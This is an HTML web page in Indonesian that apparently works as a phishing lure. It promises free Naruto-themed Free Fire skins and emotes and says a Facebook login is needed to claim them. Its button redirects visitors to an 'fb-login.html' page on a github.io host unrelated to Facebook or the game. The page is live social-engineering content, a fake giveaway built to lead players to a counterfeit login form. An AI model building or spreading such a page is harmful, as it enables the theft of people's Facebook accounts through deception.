<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=0.5">
    <title>Naruto x Free Fire</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://black-octopus-1.github.io/20250105_132451.jpg') no-repeat center center fixed;
            background-size: cover;
            font-family: Arial, sans-serif;
            color: white;
            text-align: center;
        }
        .container {
            padding: 20px;
            background: rgba(0, 0, 0, 0.25);
            display: inline-block;
            border-radius: 10px;
            margin-top: 5%;
        }
        h1 {
            font-size: 2rem;
        }
        p {
            font-size: 1.2rem;
        }
        .btn {
            background-color: #ff4500;
            color: white;
            padding: 10px 20px;
            text-decoration: none;
            border: none;
            border-radius: 5px;
            font-size: 1rem;
            cursor: pointer;
        }
        .btn:hover {
            background-color: #ff6347;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Naruto x Free Fire</h1>
        <p>Skin dan Emote Free Fire x Naruto Gratis</p>
        <h4>Login Facebook Untuk Mengambil</h4>
        <button class="btn" onclick="window.location.href='https://black-octopus-1.github.io/fb-login.html';">AMBIL</button>
    </div>
</body>
</html>